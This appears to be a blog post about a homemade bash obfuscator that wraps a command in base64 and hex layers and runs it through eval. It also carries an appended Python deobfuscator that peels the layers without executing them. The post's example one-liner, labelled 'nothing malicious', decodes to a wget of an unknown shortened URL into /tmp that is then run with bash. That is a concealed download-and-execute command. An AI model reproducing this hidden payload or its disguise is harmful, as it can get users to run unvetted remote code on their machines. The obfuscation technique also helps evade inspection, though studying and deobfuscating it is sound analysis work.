Sunday, October 27, 2013

A useless bash code obfuscation

Bash obfuscation is really hard. So, just for fun, I created a simple script that obfuscates a one-line bash command at the cost of a huge size increase!

An example is:

eval `echo -e "\x65\x76\x61\x6c\x20\x60\x65\x63\x68\x6f\x20\x22\x64\x32\x64\x6c\x64\x43\x42\x6f\x64\x48\x52\x77\x4f\x69\x38\x76\x5a\x32\x39\x76\x4c\x6d\x64\x73\x4c\x31\x55\x30\x52\x31\x4e\x4d\x59\x53\x41\x74\x63\x55\x38\x67\x4c\x33\x52\x74\x63\x43\x39\x68\x63\x32\x51\x67\x4a\x69\x59\x67\x59\x6d\x46\x7a\x61\x43\x41\x76\x64\x47\x31\x77\x4c\x32\x46\x7a\x5a\x41\x3d\x3d\x22\x20\x7c\x20\x62\x61\x73\x65\x36\x34\x20\x2d\x64\x69\x60"`

I promise it's nothing malicious :)

The idea is to create multiple levels of obfuscation and use eval to evaluate the deobfuscated string as bash code. The outer level is hex encoding, interpreted by echo -e. The second level is base64, interpreted by base64 -d.

There are lots of possible combinations :P

The code of the obfuscator is:

#!/bin/bash
# Obfuscate a one-line bash command with two layers: base64 inside, \xNN hex escapes outside.
if [[ $# -ne 1 ]] ; then
  CMD="echo ciao"
else
  CMD=$1
fi
# Inner layer: base64 of the command, decoded at runtime by `base64 -di` and fed to eval.
# Variables are quoted so that spacing inside the command survives echo's word splitting.
B64=$(echo -n "$CMD" | base64)
MIDDLE="eval \`echo \"$B64\" | base64 -di\`"
# Outer layer: every byte of the inner eval line as a \xNN escape, decoded at runtime by `echo -e`.
# In hexdump's format string "\\\x" becomes a literal backslash followed by x.
CODE=$(echo -n "$MIDDLE" | hexdump -v -e '"\\\x" 1/1 "%02x"')
LOL="eval \`echo -e \"$CODE\"\`"
echo "$LOL"
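As an added example (not the post's own code), here is a Python re-implementation of the same two-layer scheme next to a static peeler that undoes it without ever calling eval, the way an analyst would inspect such a one-liner. The regexes assume exactly the wrapper shapes the script above emits (hex layer outside, base64 layer inside); the sample command is constructed.

```python
import base64
import re

# Wrapper shapes produced by the obfuscator above (assumed layout, not a general bash parser).
HEX_LAYER = re.compile(r'^eval `echo -e "((?:\\x[0-9a-fA-F]{2})+)"`$')
B64_LAYER = re.compile(r'^eval `echo "([A-Za-z0-9+/=\s]+)" \| base64 -di?`$')


def obfuscate(cmd: str) -> str:
    """Mirror the bash script: base64 inside, \\xNN escapes outside."""
    b64 = base64.b64encode(cmd.encode()).decode()
    middle = f'eval `echo "{b64}" | base64 -di`'
    code = "".join(f"\\x{b:02x}" for b in middle.encode())
    return f'eval `echo -e "{code}"`'


def peel_once(line: str):
    """Strip one eval layer statically; return (layer_name, inner) or None if unrecognised."""
    m = HEX_LAYER.match(line)
    if m:
        # Undo echo -e: "\x65\x76..." -> raw bytes -> text.
        inner = bytes.fromhex(m.group(1).replace("\\x", "")).decode(errors="replace")
        return "hex", inner
    m = B64_LAYER.match(line)
    if m:
        # Undo base64 -di: -i ignores line wraps, so strip whitespace before decoding.
        raw = re.sub(r"\s+", "", m.group(1))
        return "base64", base64.b64decode(raw).decode(errors="replace")
    return None


def deobfuscate(line: str, max_layers: int = 10):
    """Peel layers until no recognised eval wrapper remains; nothing is executed."""
    layers = []
    for _ in range(max_layers):
        result = peel_once(line.strip())
        if result is None:
            break
        name, line = result
        layers.append(name)
    return layers, line.strip()


if __name__ == "__main__":
    sample = obfuscate("echo ciao")  # constructed input, the script's default command
    print(sample)
    print(deobfuscate(sample))
```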
